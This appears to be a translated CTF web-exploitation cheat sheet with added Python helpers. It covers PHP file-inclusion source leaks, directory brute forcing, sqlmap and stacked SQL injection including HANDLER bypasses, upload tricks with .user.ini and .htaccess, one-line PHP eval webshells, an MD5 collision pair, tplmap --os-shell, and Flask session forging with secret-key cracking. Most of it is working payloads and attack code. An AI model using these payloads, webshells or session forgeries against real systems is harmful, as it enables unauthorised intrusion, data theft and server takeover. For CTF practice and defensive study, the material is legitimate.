Bypasses for various PHP vulnerabilities
Portal: https://cloud.tencent.com/developer/article/2127498
PHP pseudo-protocols
Detailed blog explanations:
https://blog.csdn.net/cosmoslin/article/details/120695429
http://hummer.vin/2022/05/10/PHP%E4%BC%AA%E5%8D%8F%E8%AE%AE/
https://www.cnblogs.com/wjrblogs/p/12285202.html
(already saved offline locally)
Mainly used to get past the filtering in file-inclusion functions: wrapping the target file in php://filter with an encoding such as base64 makes the include return the file's source instead of executing it, and you decode it on your side afterwards.
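As an added example (mine, not part of the original notes), a small Python helper that builds such a php://filter payload for an include parameter and decodes the leaked source; it also falls back to the string.rot13 filter when the word base64 is itself filtered out of the parameter. The target URL, the parameter name and the sample source are assumptions made for the demo.

```python
# Added example, not from the original notes. Build php://filter payloads for a
# file-inclusion parameter and decode the response. base_url, param and the
# sample source are constructed placeholders.
import base64
import codecs
from urllib.parse import urlencode

# Filter chains that hand back the file's bytes in a form PHP will not execute,
# paired with the client-side decoder. Order matters: the first unblocked chain wins.
FILTER_CHAINS = {
    "base64": ("convert.base64-encode", lambda body: base64.b64decode(body)),
    "rot13": ("string.rot13",
              lambda body: codecs.decode(body.decode("latin-1"), "rot13").encode("latin-1")),
}

# Constructed sample: the source we pretend flag.php contains, and the bodies the
# server would return for each chain.
SAMPLE_SOURCE = b"<?php $flag = 'flag{example}'; ?>"
SAMPLE_BASE64_BODY = base64.b64encode(SAMPLE_SOURCE)
SAMPLE_ROT13_BODY = codecs.encode(SAMPLE_SOURCE.decode("latin-1"), "rot13").encode("latin-1")


def build_leak_url(base_url, param, resource, banned=()):
    """Return (url, chain_name) that reads `resource` through php://filter.

    `banned` holds substrings the target strips or rejects in the parameter
    (for example "base64"); the first chain whose wrapper avoids them is used.
    """
    for name, (chain, _decoder) in FILTER_CHAINS.items():
        wrapper = f"php://filter/read={chain}/resource={resource}"
        if not any(word in wrapper for word in banned):
            return f"{base_url}?{urlencode({param: wrapper})}", name
    raise ValueError("every known filter chain is blocked")


def decode_leak(body, chain_name):
    """Turn the encoded file content the include returned back into source."""
    _chain, decoder = FILTER_CHAINS[chain_name]
    return decoder(body.strip())


if __name__ == "__main__":
    url, chain = build_leak_url("http://target/index.php", "file", "flag.php",
                                banned=("base64",))
    print(url)                                    # rot13 chain, since base64 is banned
    print(decode_leak(SAMPLE_ROT13_BODY, chain))  # recovers SAMPLE_SOURCE
```

The wrapper string is percent-encoded by urlencode, which is what a browser would send; if the target inspects the raw parameter, test both the encoded and the literal form.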
Back-end scanning (directory brute force)
dirsearch
- Scan target
-u, --url            target URL
-l, --url-list=FILE  file containing target URLs
--stdin              read target URLs from standard input
--cidr               target network range (CIDR)
--raw=FILE           read a raw HTTP request from a file (set the scheme with --scheme, e.g. --scheme https)
- Extensions to scan
-e, --extensions          extensions to include (comma-separated), e.g. -e php,asp
-X, --exclude-extensions  extensions to exclude (comma-separated), e.g. -X asp,jsp
-f, --force-extensions    append every extension to every wordlist entry
By default dirsearch only replaces %EXT% in wordlist entries with the given extensions,
e.g. with -e php, Wishlist.%EXT% --> Wishlist.php
- Wordlist format
-w, --wordlists      custom wordlists (comma-separated)
--prefixes           add custom prefixes
--suffixes           add custom suffixes
--only-selected      keep only entries with the selected extensions or with no extension (directories)
--remove-extensions  strip the extension from every wordlist entry (admin.php --> admin)
-U, --uppercase      uppercase the wordlist
-L, --lowercase      lowercase the wordlist
-C, --capital        capitalize the first letter, lowercase the rest
- Filtering responses
-i                   status codes to keep (comma-separated, ranges allowed), e.g. -i 200,300-399
-x                   status codes to exclude (comma-separated, ranges allowed), e.g. -x 301,500-599
--exclude-sizes      exclude responses by size (comma-separated), e.g. 123B,4KB
--exclude-texts      exclude responses containing the given text ('Not found', 'Error')
--exclude-regexps    exclude responses matching a regex ('Not foun[a-z]{1}', '^Error$')
--exclude-redirects  exclude responses whose redirect target matches a regex ('https://okta.com/*')
--minimal            minimum response length
--maximal            maximum response length
- Request settings
-m, --http-method    HTTP method (default GET)
-d, --data           HTTP request body
-H, --header         request header, e.g. -H 'Referer: example.com' -H 'Accept: */*'
--header-list=FILE   read request headers from a file
-F, --follow-redirects  follow HTTP redirects
--user-agent         set the User-Agent header
--cookie             set the Cookie header
- Connection settings
--timeout=TIMEOUT    connection timeout
--ip=IP              server IP address
-s DELAY, --delay=DELAY  delay between requests
--proxy=PROXY        proxy URL; HTTP and SOCKS are supported, e.g. localhost:8080, socks5://localhost:8088
--proxy-list=FILE    file containing proxy addresses
--matches-proxy=PROXY  proxy to replay found paths through
--scheme             default scheme, used for raw requests read from a file or for URLs without one
--max-retries        maximum number of retries
-b, --request-by-hostname  force connecting by hostname (by default the IP is used, for speed)
--exit-on-error      exit when an error occurs
--debug              debug mode
- General settings
--version            show the dirsearch version
-h, --help           show help
-r, --recursive      recursive brute force
-R, --recursion-depth  maximum recursion depth
-t, --threads        number of threads
--subdirs            scan sub-directories, e.g. admin/ scans www.example.com/admin/ + wordlist
--exclude-subdirs    sub-directories to skip during recursive scanning
-q, --quiet-mode     quiet mode
--full-url           print full URLs
--no-color           no colored output
- Output
--simple-report=OUTPUTFILE
--plain-text-report=OUTPUTFILE
--json-report=OUTPUTFILE
--xml-report=OUTPUTFILE
--markdown-report=OUTPUTFILE
--csv-report=OUTPUTFILE
Common usage:
Basic usage
- Scan the target URL with default settings
python3 dirsearch.py -u https://target
- Scan the target URL with the wordlist expanded to the extensions php, html, js
python3 dirsearch.py -e php,html,js -u https://target
- Same, but using a wordlist at a given path
python3 dirsearch.py -e php,html,js -u https://target -w /path/to/wordlist
- Recursive scan
python3 dirsearch.py -e php,html,js -u https://target -r
- Limit recursion to 3 levels
python3 dirsearch.py -e php,html,js -u https://target -r -R 3
- Set the thread count (do not set it too high; too many threads can skew the results)
python3 dirsearch.py -e bak,zip,tgz,txt -u https://target -t 30
- Use prefixes / suffixes
python3 dirsearch.py -e php -u https://target --prefixes .,admin,_,~
For more, see: https://blog.csdn.net/qq_43936524/article/details/115271837
Version-control leaks
git leak
Use GitHack to download the project source, then audit the code. Command:
GitHack.py http://www.openssl.org/.git/      (replace with the target site)
SQL injection
sqli-labs
Notes: https://acmer.blog.csdn.net/article/details/127851636
(saved offline locally)
sqlmap
Common commands:
sqlmap -u "<injection URL>" -v 1 --dbs                                               # list databases
sqlmap -u "<injection URL>" -v 1 --current-db                                        # current database
sqlmap -u "<injection URL>" -v 1 --users                                             # list database users
sqlmap -u "<injection URL>" -v 1 -D "<database>" --tables                            # list the tables of a database
sqlmap -u "<injection URL>" -v 1 -D "<database>" -T "<table>" --columns              # list the columns of a table
sqlmap -u "<injection URL>" -v 1 -D "<database>" -T "<table>" -C "<columns>" --dump  # dump the data in the table
Points of attention
Values for --technique (letters can be combined, e.g. --technique BEU):
- B: Boolean-based blind
- U: UNION query-based
- E: Error-based
- S: Stacked queries (required when reading the file system, running OS commands or touching the registry through sqlmap; multi-statement injection)
- T: Time-based blind
Other common switches:
- --batch      never prompt; take the default answer to every question
- --dbs        enumerate the databases
- --technique  restrict sqlmap to the given detection technique(s)
sqlmap -u "http://localhost/Less-1/?id=1" --dbs --batch --technique B
Without --technique sqlmap tries every technique, so in principle each type of injection gets tested once.
- If the injection point exists but some statements will not run, a keyword is probably being filtered. Try case variation (SeLeCt) or double writing (selselectect, for a filter that strips the keyword once); select is the most commonly filtered keyword.
Stacked injection procedure
Terminate the current statement with ; and append further statements.
e.g. -1';show databases;#                list all databases
-1';show tables;#                        list the tables in the current database, to find the one worth reading
or -1';show tables from database_name;#
-1';show columns from table_name;#       list the columns; the table name is an identifier, so do not wrap it in ''
When union select is blocked, finish with -1';select flag from table_name;#. If the keyword select is filtered, the notes suggest splitting it as sel/**/ect; be aware that MySQL treats /**/ as whitespace, so sel/**/ect is parsed as two tokens and fails. Inline comments only help between whole keywords (select/**/flag/**/from/**/table_name) against filters that match on spaces. If select itself is blocked, use the handler bypass below.
Filtering
Sample challenge: https://buuoj.cn/challenges#[GYCTF2020]Blacklist
Also see the handler bypass below.
Other bypasses
MySQL
A UNION query whose original part matches no row still returns the row you supply, so the application ends up holding attacker-controlled "virtual" data. Since stored passwords are usually plaintext or an MD5, supply a row whose password column is the MD5 of a password you know and log in with it.
For example: https://buuoj.cn/challenges#[GXYCTF2019]BabySQli
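As an added example (mine, not from the original notes or the challenge) of that virtual-row trick, a self-contained Python script with a deliberately vulnerable login check. SQLite stands in for MySQL, so the trailing comment marker is -- rather than #; the schema, the stored admin hash and the application logic are constructed for the demo.

```python
# Added example, not from the original notes or the challenge. A deliberately
# vulnerable login whose UNION-injected "virtual" row lets the attacker choose
# the stored hash. SQLite stands in for MySQL (comment marker -- instead of #);
# the schema, the users and the application logic are constructed for the demo.
import hashlib
import sqlite3


def make_db():
    """In-memory users table with one admin whose password we do not know."""
    con = sqlite3.connect(":memory:")
    con.execute("create table users(id integer, username text, password text)")
    con.execute("insert into users values (1, 'admin', ?)",
                (hashlib.md5(b"unknown-admin-password").hexdigest(),))
    return con


def login(con, username, password):
    """Vulnerable: username is concatenated into the query, then the password
    is compared in application code against the md5 found in the returned row."""
    sql = f"select id, username, password from users where username='{username}'"
    row = con.execute(sql).fetchone()
    if row is None:
        return False
    return row[2] == hashlib.md5(password.encode()).hexdigest()


def forged_username(password):
    """Build the UNION payload: no real row matches username='', so the only
    row the application sees is ours, carrying the md5 of a password we pick.
    The column count and the position of the password column must match the
    real query, which is what you have to work out on a target."""
    h = hashlib.md5(password.encode()).hexdigest()
    return f"' union select 1,'admin','{h}'-- "


if __name__ == "__main__":
    con = make_db()
    print(login(con, "admin", "guess"))                    # False: wrong password
    print(login(con, forged_username("guess"), "guess"))   # True: our virtual row
```

On a real target the fix is the usual one: parameterize the query and compare against the hash of the account actually looked up, never against whatever row the database happened to return.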
handler bypass
Syntax (MySQL-specific; reads table rows without SELECT):
handler [table_name] open;
handler [table_name] read first;
handler [table_name] read next;
handler [table_name] close;
e.g. 1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;#   (the # comments out the rest of the original query)
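To make the filter behaviour in the keyword-filtering, stacked-injection and handler notes above concrete, here is an added Python example (mine, not from the original notes or from any challenge). It simulates the two kinds of keyword filter you meet in front of a stacked-injection point, a rejecting blacklist and a stripping filter, and checks which payloads survive each. The blacklist regex, the table name FlagHere and the database name are assumptions for the demo; whether a surviving payload actually parses is up to MySQL, which the comments note where it matters.

```python
# Added example, not from the original notes or any challenge. Simulates the two
# kinds of keyword filter found in front of a stacked-injection point and checks
# which payloads from the notes survive. Regexes, table and database names are
# constructed placeholders.
import re

# Rejecting blacklist: the request dies if any alternative matches.
REJECT_RE = re.compile(r"set|prepare|alter|rename|select|update|delete|drop|insert|where|\.", re.I)
# Stripping filter: matched keywords are deleted once, the remainder is executed.
STRIP_RE = re.compile(r"select|union", re.I)


def rejected(payload):
    """True if the rejecting blacklist would drop this payload."""
    return REJECT_RE.search(payload) is not None


def after_strip(payload):
    """What the stripping filter hands to the database (single pass)."""
    return STRIP_RE.sub("", payload)


def double_write(payload, keyword):
    """Double-writing bypass for a single-pass stripping filter:
    'select' -> 'selselectect', which collapses back to 'select' after one strip."""
    mid = len(keyword) // 2
    return payload.replace(keyword, keyword[:mid] + keyword + keyword[mid:])


def stacked_enum_payloads(db=None, table=None):
    """Stacked queries that enumerate the schema without the SELECT keyword."""
    payloads = ["-1';show databases;#", "-1';show tables;#"]
    if db:
        payloads.append(f"-1';show tables from {db};#")
    if table:
        # The table name is an identifier: quoting it as 'FlagHere' would make it a string.
        payloads.append(f"-1';show columns from {table};#")
    return payloads


def handler_payload(table, rows=1):
    """Read `rows` rows of `table` with HANDLER, which never needs SELECT."""
    stmts = [f"handler {table} open", f"handler {table} read first"]
    stmts += [f"handler {table} read next"] * (rows - 1)
    stmts.append(f"handler {table} close")
    return "1';" + ";".join(stmts) + ";#"


def comment_spaces(sql):
    """Swap spaces for inline comments. MySQL reads /**/ as whitespace between
    tokens, so select/**/flag is fine, but sel/**/ect splits one keyword into
    two tokens and is a syntax error even though it slips past the regex."""
    return sql.replace(" ", "/**/")


def surviving(payloads):
    """Payloads the rejecting blacklist lets through."""
    return [p for p in payloads if not rejected(p)]


if __name__ == "__main__":
    for p in stacked_enum_payloads("ctf", "FlagHere") + [handler_payload("FlagHere", rows=2)]:
        print("BLOCKED" if rejected(p) else "pass   ", p)
    print("BLOCKED" if rejected("-1';select flag from FlagHere;#") else "pass   ", "select ...")
```

The stripping filter is the case where double writing pays off; against a rejecting blacklist it does nothing, because the inner keyword still matches, and the HANDLER statements are the way to read the table.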
XSS injection
See XSS-labs: https://acmer.blog.csdn.net/article/details/127578322
(saved offline locally)
XSS bypass techniques: https://blog.csdn.net/m_de_g/article/details/119085955
(saved offline locally)
Covers sandbox escapes and XSS via template injection.
File Upload Vulnerability
.user.ini
Works when PHP runs as CGI/FastCGI (php-fpm) and the upload directory already contains a PHP file. Upload the one-word shell disguised as an image (request tampering may be needed to get past the filtering), upload a .user.ini that points at it, then connect AntSword to the existing PHP file in that directory, not to the image: auto_prepend_file makes PHP include the image before every script in that directory.
Format:
GIF89a
auto_prepend_file=number.png
.htaccess
Works on Apache with mod_php where AllowOverride permits it. The directive is FilesMatch (the original note had FileMatch, which Apache rejects as an unknown directive):
<FilesMatch "digit-shell.png">
SetHandler application/x-httpd-php
</FilesMatch>
One-word trojan (one-line webshell)
- version-1
<?php @eval($_POST[123]);?>
- version-2
GIF89a
<?php @eval($_POST['shell']);?>
- version-3 (the <script language='php'> form only works on PHP 5; PHP 7 removed it)
GIF89a
<script language='php'>eval($_POST['shell']);</script>
- version-4
image webshell (a real image with the shell appended)
Too large and full of binary data to paste here.
PHP serialization and deserialization
This mainly tests the magic methods of a PHP class (__construct, __destruct, __wakeup, __toString and so on); the notes are in the local ctf-tool folder.
md5 bypass
https://blog.csdn.net/LYJ20010728/article/details/116779357
(saved offline locally)
MD5 strong collision
if((string)$_POST['param1']!==(string)$_POST['param2'] && md5($_POST['param1'])===md5($_POST['param2'])){
die("success!");
}
The two values below are raw bytes that differ in only two positions; send them percent-encoded in the POST body so PHP decodes them before md5() sees them.
param1=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
param2=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
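As an added check (mine, not from the original notes), the following Python decodes the two percent-encoded values above the way PHP does after form decoding and confirms they are different byte strings with identical MD5 digests, which is exactly what the strict comparison in the snippet requires. It also builds the raw form body to send, because letting a client library re-encode the values would double-encode the % sequences. The target URL mentioned in form_body's docstring is a placeholder.

```python
# Added example, not from the original notes. Confirms the two values above are
# a real MD5 collision as PHP sees them after form decoding, and builds the raw
# POST body to send them. The URL mentioned in form_body is a placeholder.
import hashlib
from urllib.parse import unquote_to_bytes

PARAM1 = ("%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7"
          "%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75"
          "%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2")
PARAM2 = ("%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7"
          "%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75"
          "%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2")


def decoded(param):
    """The bytes PHP puts in $_POST after decoding the percent-encoded form value."""
    return unquote_to_bytes(param)


def md5_hex(param):
    """Hex MD5 of the decoded bytes, i.e. what md5($_POST[...]) returns."""
    return hashlib.md5(decoded(param)).hexdigest()


def php_strong_check(p1, p2):
    """Mirror of the PHP condition: strict inequality of the strings and strict
    equality of their md5 hex digests (no type juggling involved)."""
    return decoded(p1) != decoded(p2) and md5_hex(p1) == md5_hex(p2)


def form_body():
    """Raw application/x-www-form-urlencoded body. Send it as-is, e.g.
    requests.post(url, data=form_body(),
                  headers={"Content-Type": "application/x-www-form-urlencoded"});
    passing a dict instead would percent-encode the % signs a second time and the
    collision bytes would never reach md5()."""
    return f"param1={PARAM1}&param2={PARAM2}"


if __name__ == "__main__":
    print(len(decoded(PARAM1)), "bytes each, differ:", decoded(PARAM1) != decoded(PARAM2))
    print(md5_hex(PARAM1), md5_hex(PARAM2))
    print("passes strict check:", php_strong_check(PARAM1, PARAM2))
```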
SSTI (template injection)
https://blog.csdn.net/weixin_53150482/article/details/125842465
(blog saved offline locally)
A fairly foolproof tool: tplmap
Installation tutorial: https://www.cnblogs.com/ktsm/p/15691652.html
Usage:
- probe for an injection point
python2 tplmap.py -u 'http://114.67.175.224:11338/?flag'
- get a shell
python2 tplmap.py -u 'http://114.67.175.224:11338/?flag' --os-shell
Once you have a shell, look for files that might hold the flag and examine them.
If the files give no clue, check the environment variables (env); the flag may be there.
Sample challenge: https://buuoj.cn/challenges#[Flask]SSTI
Backup files
.index.php.swp   (vim swap file)
robots.txt
index.php~       (editor backup)
index.php.bak
flask session forgery
https://blog.csdn.net/since_2020/article/details/119543172
(saved offline locally)
Example: https://buuoj.cn/challenges#[%E7%AC%AC%E4%B8%80%E7%AB%A0%20web%E5%85%A5%E9%97%A8]afr_3
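As an added example (mine, not from the original notes or the linked blog), a self-contained Python script that decodes, verifies, re-signs and dictionary-attacks a Flask session cookie. It reimplements the itsdangerous URLSafeTimedSerializer layout Flask uses (salt "cookie-session", HMAC key derivation, SHA-1, optional zlib compression marked by a leading dot) as I understand it from those libraries, with no third-party imports; the secret key and session contents are constructed for the demo, so check a forged cookie against a real app before relying on it.

```python
# Added example, not from the original notes. Decode / verify / forge Flask
# session cookies without installing Flask or itsdangerous. The layout follows
# itsdangerous' URLSafeTimedSerializer as Flask configures it (assumption, verify
# against a real app); secret key and session data are constructed placeholders.
import base64
import hashlib
import hmac
import json
import time
import zlib

SALT = b"cookie-session"   # Flask's SecureCookieSessionInterface salt


def _b64e(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=")


def _b64d(data):
    data = data.encode() if isinstance(data, str) else data
    return base64.urlsafe_b64decode(data + b"=" * (-len(data) % 4))


def decode_session(cookie):
    """Read the payload without the key: the cookie is signed, not encrypted."""
    compressed = cookie.startswith(".")
    body = cookie[1:] if compressed else cookie
    raw = _b64d(body.split(".")[0])
    if compressed:
        raw = zlib.decompress(raw)
    return json.loads(raw)


def _derived_key(secret_key):
    # itsdangerous "hmac" key derivation: HMAC-SHA1(secret_key, salt)
    return hmac.new(secret_key.encode(), SALT, hashlib.sha1).digest()


def sign_session(secret_key, data, timestamp=None):
    """Produce a cookie Flask would accept for `data` under `secret_key`."""
    raw = json.dumps(data, separators=(",", ":")).encode()
    compressed = zlib.compress(raw)
    if len(compressed) < len(raw) - 1:
        value = b"." + _b64e(compressed)      # leading dot marks a compressed payload
    else:
        value = _b64e(raw)
    ts = int(time.time()) if timestamp is None else timestamp
    ts_bytes = ts.to_bytes((ts.bit_length() + 7) // 8, "big")
    signed = value + b"." + _b64e(ts_bytes)
    sig = hmac.new(_derived_key(secret_key), signed, hashlib.sha1).digest()
    return (signed + b"." + _b64e(sig)).decode()


def verify_session(secret_key, cookie):
    """True if the signature matches `secret_key` (expiry is not checked here)."""
    signed, _, sig = cookie.encode().rpartition(b".")
    expected = hmac.new(_derived_key(secret_key), signed, hashlib.sha1).digest()
    return hmac.compare_digest(_b64d(sig), expected)


def find_secret(cookie, candidates):
    """Offline dictionary attack on the key (what flask-unsign does); None if no hit."""
    for key in candidates:
        if verify_session(key, cookie):
            return key
    return None


if __name__ == "__main__":
    cookie = sign_session("s3cr3t", {"user": "guest"})
    print(cookie)
    print(decode_session(cookie))                       # readable with no key at all
    print(find_secret(cookie, ["admin", "s3cr3t"]))    # 's3cr3t'
    print(decode_session(sign_session("s3cr3t", {"user": "admin"})))
```

The forgery step is the last line: once the key is known, any session content can be re-signed, which is why a weak or leaked SECRET_KEY is an authentication bypass and not merely an information leak.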
Commonly used headers
- Referer
- Origin
- User-Agent
- X-Forwarded-For
- X-Real-IP
- Cookie
Web-tool
Download link:
Link: https://pan.baidu.com/s/10lu7wSBREUa3-NreeOquIw
Extraction code: sa6d
This toolkit is the one the author uses; it also contains some notes and materials, so download it if you need it.